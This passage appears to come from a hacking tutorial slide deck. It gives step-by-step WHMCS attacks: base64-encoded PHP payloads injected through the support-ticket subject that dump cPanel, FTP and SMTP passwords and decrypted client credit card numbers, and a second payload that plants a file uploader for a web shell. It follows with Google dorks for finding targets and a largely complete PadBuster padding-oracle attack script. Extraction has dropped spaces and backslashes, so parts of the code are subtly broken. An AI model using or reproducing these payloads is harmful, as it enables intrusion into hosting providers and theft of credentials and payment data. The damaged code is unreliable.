MjI1xyXG4iOw0KCQ0KCQkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMgQ2xpZW50IEhPU1QgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQogJHF 1ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJsaG9zdGluZyB3aGVyZSBkb2 1haW5zdGF0dXM9J0FjdGl2ZSciKTsNCg0KIA0KICAgIHdoaWxlKCR2ID0gbXlzcWxfZmV0 Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KCWlmICgoJHZbJ3VzZXJuYW1lJ10gKSBhbmQgKCR2 WydwYXNzd29yZCddKSkgew0KICAgJHRleHQ9JHRleHQuIlxyXG5Eb21haW4gIi4kdlsnZG9 tYWluJ10uIlxyXG5JUCAiLiR2WydkZWRpY2F0ZWRpcCddLiJcclxuVXNlcm5hbWUgIi4kdls ndXNlcm5hbWUnXS4iXHJcblBhc3N3b3JkICIuZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRj Y19lbmNyeXB0aW9uX2hhc2gpLiJcclxuRG9tYWluc3RhdHVzIi4kdlsnZG9tYWluc3RhdHVzJ 10uIlxyXG4iOw0KICAgIH0NCgl9DQoJJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIENsaWVudCBIT1NUICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4i Ow0KCQ0KCQ0KCQkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MgQ2xpZW50IENDICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCSRxdWVye SA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBGUk9NIGB0YmxjbGllbnRzYCBXSEVSRSBjY XJkdHlwZSA8PiAnJyBvcmRlciBieSBpc3N1ZW51bWJlciBkZXNjIik7DQoNCgkNCndoaWxl KCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KJGNjaGFzaCA9IG1kNSggJ
  • 230.
    GNjX2VuY3J5cHRpb25faGFzaC4kdlsnMCddKTsNCiRzPSAgbXlzcWxfcXVlcnkoInNlbGVjd CBjYXJkdHlwZSxBRVNfREVDUllQVChjYXJkbnVtLCd7JGNjaGFzaH0nKSBhcyBjYXJkbn VtLEFFU19ERUNSWVBUKGV4cGRhdGUsJ3skY2NoYXNofScpIGFzIGV4cGRhdGUsQUV TX0RFQ1JZUFQoaXNzdWVudW1iZXIsJ3skY2NoYXNofScpIGFzIGlzc3VlbnVtYmVyLEFF U19ERUNSWVBUKHN0YXJ0ZGF0ZSwneyRjY2hhc2h9JykgYXMgc3RhcnRkYXRlICBGUk 9NIGB0YmxjbGllbnRzYCB3aGVyZSBpZD0nIi4kdlsnMCddLiInIiApOw0KDQokdjI9bXlzcW xfZmV0Y2hfYXJyYXkoJHMpOw0KDQogICR0ZXh0PSR0ZXh0LiJcclxuIi4kdjJbMF0uInwiLi R2MlsxXS4ifCIuJHYyWzJdLiJ8Ii4kdjJbM10uInwiLiR2Mls0XTsNCn0NCg0KDQogICANCiA NCgkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IEN DICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCQ0KCWVjaG8oJHRleHQpOw =='));exit;{/php} ______________________________________________________________________________ and scroll downfill the Captcha click the submit button we will be redirected to next page where it will show cpanel username and password boom ! you have cpanel usernames and passwords of hosting panel,website hosted on that server if you are lucky , you may also get the FTP and SMTP passwords too !
  • 231.
    ok it wasall about the the cpanel,FTP and SMTP passwords if whmcs dont have any website hosted on it you wont get anything then ???????? dont be sad :) we have one more trick and this will help you to upload the shell on whmcs website :) how ??? lets move :) come back to the submit ticket page put any random info in email,name and urgency field main step is to put the php code in subject field this time we are going to put the php code, if it got executed successfully we will get a uploader on the website through which we will be able to upload shell on the website so lets start fill the any random info in other fields and put this php code in subject field {php}eval(base64_decode('JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMy VjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNp QTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ 0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5Y VnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpU RVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05 sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0Fn SUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFF vZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4b FgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIy NWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93ME tmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQl BVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUz FrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlV pUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZ
  • 232.
    G1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0iKTsNCiRm aWNoaWVyID0gZm9wZW4oJ2Rvd25sb2Fkcy9pbmRleHgucGhwJywndycpOw0KZndyaXRlK CRmaWNoaWVyLCAkYyk7DQpmY2xvc2UoJGZpY2hpZXIpOw=='));exit;{/php} ______________________________________________________________________________ fill the captchaclick enter, now first of all , have a look on the submit ticket url for example http://www.website.com/client/submitticket.php so to get the uploader replace the submitticket.php with downloads/indexx.php remember its indexx.php,when code will execute , it will create indexx.php and its uploader so open the url http://www.website.com/client/downloads/indexx.php you will see file upload option ! browse the shell andclickupload afteruploadingshell opnthe url http://www.website.com/client/downloads/shell_name.php hell yeah owned:D
  • 233.
    WHMCS Auto Exploiter Take WHMCS auto exploiter php script.  Upload it to some php server.  In Google Dork make your own dork and click exploit like : Dorks : inurl:submitticket.php site:.com inurl:submitticket.php site:.net inurl:submitticket.php site:.us inurl:submitticket.php site:.eu inurl:submitticket.php site:.org inurl:submitticket.php site:.uk intext:”Powered by WHMCompleteSolution” intext:”Powered by WHMCompleteSolution” inurl:clientarea.php inurl:announcements.php intext:”WHMCompleteSolution” intext:”Powered by WHMCS”  Crack hash.  Go to site and open admin panel and make successful login.
  • 235.
    Oracle Padding AttackUsing Brup Suite Requiements :  MicrosoftSQlServer 2008 R2  Brup Suit Professionalv1.4.07  exe.bat[ Save it in notepad and rename as exe.bat ] @echo off cmd  padBuster.pl [ Save it in notepad and rename as padBuster.pl ] #!/usr/bin/perl # # PadBuster v0.3.3 - Automated script for performing Padding Oracle attacks # Brian Holyfield - Gotham Digital Science (labs@gdssecurity.com) # # Credits to J.Rizzo and T.Duong for providing proof of concept web exploit # techniques and S.Vaudenay for initial discovery of the attack. Credits also # to James M. Martin (research@esptl.com) for sharing proof of concept exploit # code for performing various brute force attack techniques, and wireghoul (Eldar # Marcussen) for making code quality improvements. # use LWP::UserAgent; use strict; use warnings; use Getopt::Std; use MIME::Base64;
  • 236.
    use URI::Escape; use Getopt::Long; useTime::HiRes qw( gettimeofday ); use Compress::Zlib; use Crypt::SSLeay; # Set defaults with $variable = value my $logFiles; my $post; my $encoding = 0; my $headers; my $cookie; my $error; my $prefix; my $intermediaryInput; my $cipherInput; my $plainTextInput; my $encodedPlainTextInput; my $noEncodeOption; my $superVerbose; my $proxy; my $proxyAuth; my $noIv; my $auth; my $resumeBlock; my $interactive = 0;
  • 237.
    my $bruteForce; my $ignoreContent; my$useBody; my $verbose; GetOptions( "log" => $logFiles, "post=s" => $post, "encoding=s" => $encoding, "headers=s" => $headers, "cookies=s" => $cookie, "error=s" => $error, "prefix=s" => $prefix, "intermediate=s" => $intermediaryInput, "ciphertext=s" => $cipherInput, "plaintext=s" => $plainTextInput, "encodedtext=s" => $encodedPlainTextInput, "noencode" => $noEncodeOption, "veryverbose" => $superVerbose, "proxy=s" => $proxy, "proxyauth=s" => $proxyAuth, "noiv" => $noIv, "auth=s" => $auth, "resume=s" => $resumeBlock, "interactive" => $interactive, "bruteforce" => $bruteForce, "ignorecontent" => $ignoreContent,
  • 238.
    "usebody" => $useBody, "verbose"=> $verbose); print "n+-------------------------------------------+n"; print "| PadBuster - v0.3.3 |n"; print "| Brian Holyfield - Gotham Digital Science |n"; print "| labs@gdssecurity.com |n"; print "+-------------------------------------------+n"; if ($#ARGV < 2) { die " Use: padBuster.pl URL EncryptedSample BlockSize [options] Where: URL = The target URL (and query string if applicable) EncryptedSample = The encrypted value you want to test. Must also be present in the URL, PostData or a Cookie BlockSize = The block size being used by the algorithm Options: -auth [username:password]: HTTP Basic Authentication -bruteforce: Perform brute force against the first block -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded) -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2) -encoding [0-4]: Encoding Format of Sample (Default 0) 0=Base64, 1=Lower HEX, 2=Upper HEX 3=.NET UrlToken, 4=WebSafe Base64
  • 239.
    -encodedtext [Encoded String]:Data to Encrypt (Encoded) -error [Error String]: Padding Error Message -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2) -interactive: Prompt for confirmation on decrypted bytes -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded) -log: Generate log files (creates folder PadBuster.DDMMYY) -noencode: Do not URL-encode the payload (encoded by default) -noiv: Sample does not include IV (decrypt first block) -plaintext [String]: Plain-Text to Encrypt -post [Post Data]: HTTP Post Data String -prefix [Prefix]: Prefix bytes to append to each sample (Encoded) -proxy [address:port]: Use HTTP/S Proxy -proxyauth [username:password]: Proxy Authentication -resume [Block Number]: Resume at this block number -usebody: Use response body content for response analysis phase -verbose: Be Verbose -veryverbose: Be Very Verbose (Debug Only) ";} # Ok, if we've made it this far we are ready to begin.. my $url = $ARGV[0]; my $sample = $ARGV[1]; my $blockSize = $ARGV[2]; if ($url eq "" || $sample eq "" || $blockSize eq "") {
  • 240.
    print "nERROR: TheURL, EncryptedSample and BlockSize cannot be null.n"; exit(); } # Hard Coded Inputs #$post = ""; #$sample = ""; my $method = $post ? "POST" : "GET"; # These are file related variables my $dirName = "PadBuster." . &getTime("F"); my $dirSlash = "/"; my $dirCmd = "mkdir "; if (defined($ENV{'OS'})) { if ($ENV{OS} =~ /Windows/) { $dirSlash = ""; $dirCmd = "md "; } } my $dirExists = 0; my $printStats = 0; my $requestTracker = 0; my $timeTracker = 0; if ($encoding < 0 || $encoding > 4) {
  • 241.
    print "nERROR: Encodingmust be a value between 0 and 4n"; exit(); } my $encodingFormat = $encoding ? $encoding : 0; my $encryptedBytes = $sample; my $totalRequests = 0; # See if the sample needs to be URL decoded, otherwise don't (the plus from B64 will be a problem) if ($sample =~ /%/) { $encryptedBytes = &uri_unescape($encryptedBytes) } # Prep the sample for regex use $sample = quotemeta $sample; # Now decode $encryptedBytes = &myDecode($encryptedBytes, $encodingFormat); if ( (length($encryptedBytes) % $blockSize) > 0) { print "nERROR: Encrypted Bytes must be evenly divisible by Block Size ($blockSize)n"; print " Encrypted sample length is ".int(length($encryptedBytes)).". Double check the Encoding and Block Size.n"; exit(); }
  • 242.
    # If noIV, then append nulls as the IV (only if decrypting) if ($noIv && !$bruteForce && !$plainTextInput) { $encryptedBytes = "x00" x $blockSize . $encryptedBytes; } # PlainTextBytes is where the complete decrypted sample will be stored (decrypt only) my $plainTextBytes; # This is a bool to make sure we know where to replace the sample string my $wasSampleFound = 0; # ForgedBytes is where the complete forged sample will be stored (encrypt only) my $forgedBytes; # Isolate the IV into a separate byte array my $ivBytes = substr($encryptedBytes, 0, $blockSize); # Declare some optional elements for storing the results of the first test iteration # to help the user if they don't know what the padding error looks like my @oracleCantidates; my $oracleSignature = ""; my %oracleGuesses; my %responseFileBuffer; # The block count should be the sample divided by the blocksize my $blockCount = int(length($encryptedBytes)) / int($blockSize);
  • 243.
    if (!$bruteForce &&!$plainTextInput && $blockCount < 2) { print "nERROR: There is only one block. Try again using the -noiv option.n"; exit(); } # The attack works by sending in a real cipher text block along with a fake block in front of it # You only ever need to send two blocks at a time (one real one fake) and just work through # the sample one block at a time # First, re-issue the original request to let the user know if something is potentially broken my ($status, $content, $location, $contentLength) = &makeRequest($method, $url, $post, $cookie); &myPrint("nINFO: The original request returned the following",0); &myPrint("[+] Status: $status",0); &myPrint("[+] Location: $location",0); &myPrint("[+] Content Length: $contentLengthn",0); &myPrint("[+] Response: $contentn",1); $plainTextInput = &myDecode($encodedPlainTextInput,$encodingFormat) if $encodedPlainTextInput; if ($bruteForce) { &myPrint("INFO: Starting PadBuster Brute Force Mode",0); my $bfAttempts = 0;
  • 244.
    print "INFO: Resumingprevious brute force at attempt $resumeBlockn" if $resumeBlock; # Only loop through the first 3 bytes...this should be enough as it # requires 16.5M+ requests my @bfSamples; my $sampleString = "x00" x 2; for my $c (0 ... 255) { substr($sampleString, 0, 1, chr($c)); for my $d (0 ... 255) { substr($sampleString, 1, 1, chr($d)); push (@bfSamples, $sampleString); } } foreach my $testVal (@bfSamples) { my $complete = 0; while ($complete == 0) { my $repeat = 0; for my $b (0 ... 255) { $bfAttempts++; if ( $resumeBlock && ($bfAttempts < ($resumeBlock - ($resumeBlock % 256)+1)) ) { #SKIP } else {
  • 245.
    my $testBytes =chr($b).$testVal; $testBytes .= "x00" x ($blockSize-3); my $combinedBf = $testBytes; $combinedBf .= $encryptedBytes; $combinedBf = &myEncode($combinedBf, $encoding); # Add the Query String to the URL my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedBf); # Issue the request my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies); my $signatureData = "$statust$contentLengtht$location"; $signatureData = "$statust$contentLengtht$locationt$content" if $useBody; if ($oracleSignature eq "") { &myPrint("[+] Starting response analysis...n",0) if ($b ==0); $oracleGuesses{$signatureData}++; $responseFileBuffer{$signatureData} = "Status: $statusnLocation: $locationnContent-Length: $contentLengthnContent:n$content"; if ($b == 255) { &myPrint("*** Response Analysis Complete ***n",0); &determineSignature();
  • 246.
    $printStats = 1; $timeTracker= 0; $requestTracker = 0; $repeat = 1; $bfAttempts = 0; } } if ($oracleSignature ne "" && $oracleSignature ne $signatureData) { &myPrint("nAttempt $bfAttempts - Status: $status - Content Length: $contentLengthn$testUrln",0); &writeFile("Brute_Force_Attempt_".$bfAttempts.".txt", "URL: $testUrlnPost Data: $testPostnCookies: $testCookiesnnStatus: $statusnLocation: $locationnContent-Length: $contentLengthnContent:n$content"); } } } ($repeat == 1) ? ($complete = 0) : ($complete = 1); } } } elsif ($plainTextInput) { # ENCRYPT MODE &myPrint("INFO: Starting PadBuster Encrypt Mode",0); # The block count will be the plaintext divided by blocksize (rounded up) my $blockCount = int(((length($plainTextInput)+1)/$blockSize)+0.99); &myPrint("[+] Number of Blocks: ".$blockCount."n",0);
  • 247.
    my $padCount =($blockSize * $blockCount) - length($plainTextInput); $plainTextInput.= chr($padCount) x $padCount; # SampleBytes is the encrypted text you want to derive intermediate values for, so # copy the current ciphertext block into sampleBytes # Note, nulls are used if not provided and the intermediate values are brute forced $forgedBytes = $cipherInput ? &myDecode($cipherInput,1) : "x00" x $blockSize; my $sampleBytes = $forgedBytes; for (my $blockNum = $blockCount; $blockNum > 0; $blockNum--) { # IntermediaryBytes is where the intermediate bytes produced by the algorithm are stored my $intermediaryBytes; if ($intermediaryInput && $blockNum == $blockCount) { $intermediaryBytes = &myDecode($intermediaryInput,2); } else { $intermediaryBytes = &processBlock($sampleBytes); } # Now XOR the intermediate bytes with the corresponding bytes from the plain-text block # This will become the next ciphertext block (or IV if the last one) $sampleBytes = $intermediaryBytes ^ substr($plainTextInput, (($blockNum-1) * $blockSize), $blockSize); $forgedBytes = $sampleBytes.$forgedBytes;
  • 248.
    &myPrint("nBlock ".($blockNum)." Results:",0); &myPrint("[+]New Cipher Text (HEX): ".&myEncode($sampleBytes,1),0); &myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1)."n",0); } $forgedBytes = &myEncode($forgedBytes, $encoding); chomp($forgedBytes); } else { # DECRYPT MODE &myPrint("INFO: Starting PadBuster Decrypt Mode",0); if ($resumeBlock) { &myPrint("INFO: Resuming previous exploit at Block $resumeBlockn",0); } else { $resumeBlock = 1 } # Assume that the IV is included in our sample and that the first block is the IV for (my $blockNum = ($resumeBlock+1); $blockNum <= $blockCount; $blockNum++) { # Since the IV is the first block, our block count is artificially inflated by one &myPrint("*** Starting Block ".($blockNum-1)." of ".($blockCount-1)." ***n",0); # SampleBytes is the encrypted text you want to break, so
  • 249.
    # lets copythe current ciphertext block into sampleBytes my $sampleBytes = substr($encryptedBytes, ($blockNum * $blockSize - $blockSize), $blockSize); # IntermediaryBytes is where the the intermediary bytes produced by the algorithm are stored my $intermediaryBytes = &processBlock($sampleBytes); # DecryptedBytes is where the decrypted block is stored my $decryptedBytes; # Now we XOR the decrypted byte with the corresponding byte from the previous block # (or IV if we are in the first block) to get the actual plain-text $blockNum == 2 ? $decryptedBytes = $intermediaryBytes ^ $ivBytes : $decryptedBytes = $intermediaryBytes ^ substr($encryptedBytes, (($blockNum - 2) * $blockSize), $blockSize); &myPrint("nBlock ".($blockNum-1)." Results:",0); &myPrint("[+] Cipher Text (HEX): ".&myEncode($sampleBytes,1),0); &myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1),0); &myPrint("[+] Plain Text: $decryptedBytesn",0); $plainTextBytes = $plainTextBytes.$decryptedBytes; } } &myPrint("-------------------------------------------------------",0);
  • 250.
    &myPrint("** Finished ***n",0); if ($plainTextInput) { &myPrint("[+] Encrypted value is: ".&uri_escape($forgedBytes),0); } else { &myPrint("[+] Decrypted value (ASCII): $plainTextBytesn",0); &myPrint("[+] Decrypted value (HEX): ".&myEncode($plainTextBytes,2)."n", 0); &myPrint("[+] Decrypted value (Base64): ".&myEncode($plainTextBytes,0)."n", 0); } &myPrint("-------------------------------------------------------n",0); sub determineSignature { # Help the user detect the oracle response if an error string was not provided # This logic will automatically suggest the response pattern that occured most often # during the test as this is the most likeley one my @sortedGuesses = sort {$oracleGuesses{$a} <=> $oracleGuesses{$b}} keys %oracleGuesses; &myPrint("The following response signatures were returned:n",0); &myPrint("-------------------------------------------------------",0); if ($useBody) { &myPrint("ID#tFreqtStatustLengthtChksumtLocation",0); } else { &myPrint("ID#tFreqtStatustLengthtLocation",0); } &myPrint("-------------------------------------------------------",0);
  • 251.
    my $id =1; foreach (@sortedGuesses) { my $line = $id; ($id == $#sortedGuesses+1 && $#sortedGuesses != 0) ? $line.= " **" : $line.=""; my @sigFields = split("t", $_); $line .= "t$oracleGuesses{$_}t$sigFields[0]t$sigFields[1]"; $useBody ? ( $line .= "t".unpack( '%32A*', $sigFields[3] ) ) : $line.=""; $line .= "t$sigFields[2]"; &myPrint($line,0); &writeFile("Response_Analysis_Signature_".$id.".txt", $responseFileBuffer{$_}); $id++; } &myPrint("-------------------------------------------------------",0); if ($#sortedGuesses == 0 && !$bruteForce) { &myPrint("nERROR: All of the responses were identical.n",0); &myPrint("Double check the Block Size and try again.",0); exit(); } else { my $responseNum = &promptUser("nEnter an ID that matches the error conditionnNOTE: The ID# marked with ** is recommended"); &myPrint("nContinuing test with selection $responseNumn",0); $oracleSignature = $sortedGuesses[$responseNum-1]; }
  • 252.
    } sub prepRequest { my($pUrl, $pPost, $pCookie, $pSample, $pTestBytes) = @_; # Prepare the request my $testUrl = $pUrl; my $wasSampleFound = 0; if ($pUrl =~ /$pSample/) { $testUrl =~ s/$pSample/$pTestBytes/; $wasSampleFound = 1; } my $testPost = ""; if ($pPost) { $testPost = $pPost; if ($pPost =~ /$pSample/) { $testPost =~ s/$pSample/$pTestBytes/; $wasSampleFound = 1; } } my $testCookies = ""; if ($pCookie) { $testCookies = $pCookie;
  • 253.
    if ($pCookie =~/$pSample/) { $testCookies =~ s/$pSample/$pTestBytes/; $wasSampleFound = 1; } } if ($wasSampleFound == 0) { &myPrint("ERROR: Encrypted sample was not found in the test request",0); exit(); } return ($testUrl, $testPost, $testCookies); } sub processBlock { my ($sampleBytes) = @_; my $analysisMode; # Analysis mode is either 0 (response analysis) or 1 (exploit) $analysisMode = (!$error && $oracleSignature eq "") ? 0 : 1; # The return value of this subroutine is the intermediate text for the block my $returnValue; my $complete = 0; my $autoRetry = 0; my $hasHit = 0;
  • 254.
    while ($complete ==0) { # Reset the return value $returnValue = ""; my $repeat = 0; # TestBytes are the fake bytes that are pre-pending to the cipher test for the padding attack my $testBytes = "x00" x $blockSize; my $falsePositiveDetector = 0; # Work on one byte at a time, starting with the last byte and moving backwards OUTERLOOP: for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) { INNERLOOP: for (my $i = 255; $i >= 0; $i--) { # Fuzz the test byte substr($testBytes, $byteNum, 1, chr($i)); # Combine the test bytes and the sample my $combinedTestBytes = $testBytes.$sampleBytes; if ($prefix) { $combinedTestBytes = &myDecode($prefix,$encodingFormat).$combinedTestBytes }
  • 255.
    $combinedTestBytes = &myEncode($combinedTestBytes, $encodingFormat); chomp($combinedTestBytes); if(! $noEncodeOption) { $combinedTestBytes = &uri_escape($combinedTestBytes); } my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedTestBytes); # Ok, now make the request my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies); my $signatureData = "$statust$contentLengtht$location"; $signatureData = "$statust$contentLengtht$locationt$content" if $useBody; # If this is the first block and there is no padding error message defined, then cycle through # all possible requests and let the user decide what the padding error behavior is. if ($analysisMode == 0) { &myPrint("INFO: No error string was provided...starting response analysisn",0) if ($i == 255);
  • 256.
    $oracleGuesses{$signatureData}++; $responseFileBuffer{$signatureData} = "URL: $testUrlnPostData: $testPostnCookies: $testCookiesnnStatus: $statusnLocation: $locationnContent-Length: $contentLengthnContent:n$content"; if ($byteNum == $blockSize - 1 && $i == 0) { &myPrint("*** Response Analysis Complete ***n",0); &determineSignature(); $analysisMode = 1; $repeat = 1; last OUTERLOOP; } } my $continue = "y"; if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) { # This is for autoretry logic (only works on the first byte) if ($autoRetry == 1 && ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) { $hasHit++; } else { # If there was no padding error, then it worked &myPrint("[+] Success: (".abs($i-256)."/256) [Byte ".($byteNum+1)."]",0);
  • 257.
    &myPrint("[+] Test Byte:".&uri_escape(substr($testBytes, $byteNum,1)),1); # If continually getting a hit on attempt zero, then something is probably wrong $falsePositiveDetector++ if ($i == 255); if ($interactive == 1) { $continue = &promptUser("Do you want to use this value (Yes/No/All)? [y/n/a]","",1); } if ($continue eq "y" || $continue eq "a") { $interactive = 0 if ($continue eq "a"); # Next, calculate the decrypted byte by XORing it with the padding value my ($currentPaddingByte, $nextPaddingByte); # These variables could allow for flexible padding schemes (for now PCKS) # For PCKS#7, the padding block is equal to chr($blockSize - $byteNum) $currentPaddingByte = chr($blockSize - $byteNum); $nextPaddingByte = chr($blockSize - $byteNum + 1);
  • 258.
    my $decryptedByte =substr($testBytes, $byteNum, 1) ^ $currentPaddingByte; &myPrint("[+] XORing with Padding Char, which is ".&uri_escape($currentPaddingByte),1); $returnValue = $decryptedByte.$returnValue; &myPrint("[+] Decrypted Byte is: ".&uri_escape($decryptedByte),1); # Finally, update the test bytes in preparation for the next round, based on the padding used for (my $k = $byteNum; $k < $blockSize; $k++) { # First, XOR the current test byte with the padding value for this round to recover the decrypted byte substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $currentPaddingByte)); # Then, XOR it again with the padding byte for the next round substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $nextPaddingByte)); } last INNERLOOP; } } }
  • 259.
    ## TODO: Combinethese two blocks? if ($i == 0 && $analysisMode == 1) { # End of the road with no success. We should probably try again. &myPrint("ERROR: No matching response on [Byte ".($byteNum+1)."]",0); if ($autoRetry == 0) { $autoRetry = 1; &myPrint(" Automatically trying one more time...",0); $repeat = 1; last OUTERLOOP; } else { if (($byteNum == $blockSize - 1) && ($error)) { &myPrint("nAre you sure you specified the correct error string?",0); &myPrint("Try re-running without the -e option to perform a response analysis.n",0); } $continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1); if ($continue ne "n") { &myPrint("INFO: Switching to interactive mode",0); $interactive = 1; $repeat = 1;
  • 260.
    last OUTERLOOP; } } } if ($falsePositiveDetector== $blockSize) { &myPrint("n*** ERROR: It appears there are false positive results. ***n",0); &myPrint("HINT: The most likely cause for this is an incorrect error string.n",0); if ($error) { &myPrint("[+] Check the error string you provided and try again, or consider running",0); &myPrint("[+] without an error string to perform an automated response analysis.n",0); } else { &myPrint("[+] You may want to consider defining a custom padding error string",0); &myPrint("[+] instead of the automated response analysis.n",0); } $continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1); if ($continue eq "y") { &myPrint("INFO: Switching to interactive mode",0); $interactive = 1; $repeat = 1; last OUTERLOOP; }
  • 261.
    } } } ($repeat == 1)? ($complete = 0) : ($complete = 1); } return $returnValue; } sub makeRequest { my ($method, $url, $data, $cookie) = @_; my ($noConnect, $lwp, $status, $content, $req, $location, $contentLength); my $numRetries = 0; $data ='' unless $data; $cookie='' unless $cookie; $requestTracker++; do { #Quick hack to avoid hostname in URL when using a proxy with SSL (this will get re-set later if needed) $ENV{HTTPS_PROXY} = ""; $lwp = LWP::UserAgent->new(env_proxy => 1, keep_alive => 1, timeout => 30, requests_redirectable => [],
  • 262.
    ); $req = newHTTP::Request $method => $url; &myPrint("Request:n$methodn$urln$datan$cookie",0) if $superVerbose; # Add request content for POST and PUTS if ($data) { $req->content_type('application/x-www-form-urlencoded'); $req->content($data); } if ($proxy) { my $proxyUrl = "http://"; if ($proxyAuth) { my ($proxyUser, $proxyPass) = split(":",$proxyAuth); $ENV{HTTPS_PROXY_USERNAME} = $proxyUser; $ENV{HTTPS_PROXY_PASSWORD} = $proxyPass; $proxyUrl .= $proxyAuth."@"; } $proxyUrl .= $proxy; $lwp->proxy(['http'], "http://".$proxy); $ENV{HTTPS_PROXY} = "http://".$proxy; }
  • 263.
    if ($auth) { my($httpuser, $httppass) = split(/:/,$auth); $req->authorization_basic($httpuser, $httppass); } # If cookies are defined, add a COOKIE header if (! $cookie eq "") { $req->header(Cookie => $cookie); } if ($headers) { my @customHeaders = split(/;/i,$headers); for (my $i = 0; $i <= $#customHeaders; $i++) { my ($headerName, $headerVal) = split(/::/i,$customHeaders[$i]); $req->header($headerName, $headerVal); } } my $startTime = &gettimeofday(); my $response = $lwp->request($req); my $endTime = &gettimeofday(); $timeTracker = $timeTracker + ($endTime - $startTime); if ($printStats == 1 && $requestTracker % 250 == 0) { print "[+] $requestTracker Requests Issued (Avg Request Time: ".(sprintf "%.3f", $timeTracker/100).")n";
  • 264.
    $timeTracker = 0; } #Extract the required attributes from the response $status = substr($response->status_line, 0, 3); $content = $response->content; &myPrint("Response Content:n$content",0) if $superVerbose; $location = $response->header("Location"); if (!$location) { $location = "N/A"; } #$contentLength = $response->header("Content-Length"); $contentLength = length($content); my $contentEncoding = $response->header("Content-Encoding"); if ($contentEncoding) { if ($contentEncoding =~ /GZIP/i ) { $content = Compress::Zlib::memGunzip($content); $contentLength = length($content); } } my $statusMsg = $response->status_line; #myPrint("Status: $statusMsg, Location: $location, Length: $contentLength",1);
  • 265.
    if ($statusMsg =~/Can't connect/) { print "ERROR: $statusMsgn Retrying in 10 seconds...nn"; $noConnect = 1; $numRetries++; sleep 10; } else { $noConnect = 0; $totalRequests++; } } until (($noConnect == 0) || ($numRetries >= 15)); if ($numRetries >= 15) { &myPrint("ERROR: Number of retries has exceeded 15 attempts...quitting.n",0); exit; } return ($status, $content, $location, $contentLength); } sub myPrint { my ($printData, $printLevel) = @_; $printData .= "n"; if (($verbose && $printLevel > 0) || $printLevel < 1 || $superVerbose) { print $printData; &writeFile("ActivityLog.txt",$printData); } }
  • 266.
